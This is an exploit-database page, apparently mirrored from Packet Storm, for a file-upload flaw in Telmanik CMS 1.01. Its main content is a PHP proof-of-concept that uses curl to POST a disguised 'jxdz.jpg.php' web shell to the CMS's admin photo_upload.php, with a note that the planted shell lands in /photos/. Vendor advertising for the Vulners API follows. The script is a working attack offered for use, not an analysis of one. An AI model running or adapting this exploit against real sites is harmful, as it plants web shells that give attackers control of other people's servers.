Lucene search
K

Telmanik CMS 1.01 Shell Upload

🗓️ 13 Dec 2013 00:00:00Reported by JoKeR_StExType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Telmanik CMS 1.01 Shell Upload vulnerability in file upload functionalit

Code
`/*  
##########################################################################  
  
Exploit title : telmanik cms v1.01 File Upload  
  
Date : 12/12/2013  
  
Author : JoKeR_StEx  
  
Software Link : http://www.telmanik.com/open-source.php  
  
Tested On : WinXP PRO SP3  
  
CVE : [~]  
  
Version : 1.01  
  
#########################################################################  
*/  
  
1) File Upload  
  
P.O.C  
  
<?  
  
# <3Algeria<3  
  
$web = "http://127.0.0.1/telmanik/upload/admin/photo_upload.php";  
$dz = curl_init();  
$shell = "jxdz.jpg.php";  
curl_setopt($dz,CURLOPT_URL,$web);  
curl_setopt($dz,CURLOPT_RETURNTRANSFER,true);  
curl_setopt($dz,CURLOPT_HEADER,false);  
curl_setopt($dz,CURLOPT_VERBOSE,false);  
curl_setopt($dz,CURLOPT_POST,true);  
$jxarray = array("image1"=>"@".$shell);  
curl_setopt($dz,CURLOPT_POSTFIELDS,$jxarray);  
$exec=curl_exec($dz);  
$end=curl_close($dz);  
  
?>  
  
//The Shell YOu cAn Find it in /photos/  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation